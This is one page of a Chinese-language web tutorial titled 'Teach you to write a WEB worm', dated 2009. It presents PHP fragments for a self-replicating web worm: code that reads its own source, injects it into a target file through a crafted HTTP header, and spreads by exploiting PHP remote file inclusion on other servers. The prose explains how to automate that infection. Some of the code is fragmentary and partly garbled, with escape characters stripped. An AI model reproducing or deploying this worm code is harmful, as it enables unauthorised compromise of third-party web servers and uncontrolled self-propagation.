WEB开发网
开发学院网络安全黑客技术 教你编写WEB蠕虫 阅读

教你编写WEB蠕虫

 2009-06-12 16:54:59 来源:WEB开发网   
核心提示: $source = str_replace("$", "\$",str_replace(""", "\"",str_replace("\","\\",

  $source = str_replace("$", "\$",str_replace(""", "\"",str_replace("\",
  "\\",file_get_contents($_SERVER['PHP_SELF']))));
  ...
  Client-Ip:
  "$source");fclose($fp); ?>rn ...
  ...
  for ($i=0;$i<2;$i++) { $bob = make_request($domain, $packet); }
  make_request($domain, "GET $location/data/flood.db.php HTTP/1.1rnHost:
  $domainrnConnection: closernrn");

其它感染方式:PHP文件包含

关于将PHP文件包含漏洞的处理自动化的技术也并不是很难,通常我们粗劣写出来的PHP脚本都普遍含有这样一段代码,该代码存在远程PHP代码执行漏洞,我们可以将一小段PHP代码作为GET 变量'page'的值,然后通过URL进行传输。这样我们的通过URL来发送HTTP GET request 以使其在其它服务器上自行运行,蠕虫就可以在WEB的根目录下的一些地方进行自我复制了。

  $fp = fopen("sekret.txt", "w");
  fwrite($fp, file_get_contents($_SERVER['PHP_SELF']));
  fclose($fp);
  $url = $_SERVER['SCRIPT_URI'];
  make_request($domain, "GET /test.php?path=$url HTTP/1.1rnHost:
  $domainrnConnection: closernrn");

其它感染方式:SQL

其它感染方式:JavaScript / XSS

===搜集目标===

在worm开发期间,最为明智的做法是将实际的利用代码与目标搜集代码相分离开来。你可以在自己的机器上或局域网内,使用类似下列的代码进行测试:

上一页  1 2 3 4 5  下一页

Tags:编写 WEB 蠕虫

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接